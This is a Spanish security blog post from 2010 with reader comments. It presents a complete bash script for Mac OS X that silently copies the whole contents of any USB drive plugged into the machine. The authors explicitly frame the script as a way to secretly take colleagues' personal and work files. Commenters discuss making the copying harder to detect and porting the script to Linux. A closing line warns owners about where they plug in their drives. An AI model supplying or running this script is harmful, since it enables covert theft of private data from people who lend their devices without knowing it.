Menú principal

martes, 26 de octubre de 2010

USB Dumping en Mac OS X

Una de las técnicas de robo de información de forma local es la llamada ‘USB Dumping’. Ésta técnica consiste en realizar un copiado de la información de cualquier dispositivo USB que se conecte a nuestro equipo, de forma totalmente transparente al usuario.

Éste tipo de ataques puede resultar útil en entornos de trabajo en los cuales un compañero te pide la impresión de un documento, y para ello te proporciona un pendrive en el cual está el documento a imprimir junto con un montón de datos que el usuario, descuidadamente, mantiene en el mismo dispositivo.

De este modo, al conectar el dispositivo USB para la impresión del documento, se estará produciendo un copiado al completo del contenido del disco y, aunque el propietario del pendrive esté atento a las acciones realizadas sobre el mismo, le será imposible detectar que se ha realizado una copia de toda su información. 

Desde Seguridad Apple hemos desarrollado un pequeño script que realiza esta tarea y que puedes tener corriendo siempre en tu sistema Mac OS X para ver que "cazas". Normalmente la gente suele mezclar en sus pendrives personales documentos de trabajo, datos de intercambio y cosas de alto nivel de intimidad. El código es el siguiente:
#!/bin/bash
#www.seguridadapple.com
function saveDefaultDevices()
{
rm -rf /tmp/usblist /tmp/Volumes
mkdir /tmp/Volumes
for vol in /Volumes/*
do
echo $vol >> /tmp/usblist
echo "Detecting $vol as default"
done
}
function checkDevices()
{
for vol in /Volumes/*
do
aux=`cat /tmp/usblist |grep -i "$vol"`
aux=`echo $?`
if [ $aux -eq 1 ]; then
echo $vol >> /tmp/usblist
mkdir "/tmp$vol"
echo "[+] Dumping $vol in /tmp$vol"
sleep 1
cp -R "$vol" "/tmp/Volumes/"
echo "[+] Done"
fi
done
}
saveDefaultDevices
while [ 1 ]; do
checkDevices
sleep 1
done
El funcionamiento del script es muy sencillo. Únicamente es necesario ejecutarlo mediante el comando ‘sh usb.sh’, y esperar a que se introduzca un nuevo dispositivo USB. Será en este momento en el cual el script detectará su presencia y comenzará a realizar su volcado en el directorio "/tmp/Volumes/".


Como se ve en las capturas de pantalla, tras realizarse el volcado de “/Volumes/Untitled”, se puede acceder a su contenido copiado en ”/tmp/Volumes/Untitled/


Ten mucho cuidado donde pinchas un pendrive ya que el peligro no es sólo que se infecte, sino que te roben todos los datos que en él tengas sin que te des cuenta.

8 comentarios:

  1. El while [1] no se podría mejorar por algún evento que se genere al conectar el USB? (algo parecido a udev en linux, que seguro que hay en osx)

    ResponderEliminar
  2. Si, seguramente si sería posible capturar las llamadas del sistema que indiquen que se ha conectado un dispositivo USB, sin embargo este script está desarrollado como prueba de concepto, por lo que no se ha tenido muy en cuenta el desarrollo del código ni la portabilidad a otros sistemas como linux, sino más bien la funcionalidad en mac os

    ResponderEliminar
  3. Lo que si molaria que el script fuera capaz de detectar que el usuario quiere desmontar el volumen, si no al intentar desmontar mientras se copia te dira que no se puede porque el dispositivo esta en uso, no?

    ResponderEliminar
  4. Hola Palako,

    Tienes razón, si. Al intentar desmontar el volumen se produciría un error indicando que el dispositivo está en uso (en caso de que la copia no se haya finalizado). Pensaremos en alguna forma de poder evitar esto capturando la extracción de volúmenes

    un saludo!

    ResponderEliminar
  5. Hola, me gustaria saber si existe alguna version de este script para debian, pues he tratado de modificarlo,pero hay algunas cosas que no entiendo, por favor si puede hacermelo llegar a mi mi correo, wilde85@gmail.com

    ResponderEliminar
  6. Hola Anónimo, el script está desarrollado para correr en sistemas Mac OS X, pero al tratarse de un script en bash puedes modificarlo facilmente cambiando las rutas en donde tu sistema operativo monte los volumenes (En mac os x es en /Volumes/

    ResponderEliminar
  7. me podrian ayudar, desconosco como hacer lo del sript me ayduarian mucho con un paso a paso.
    Gracias

    ResponderEliminar

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares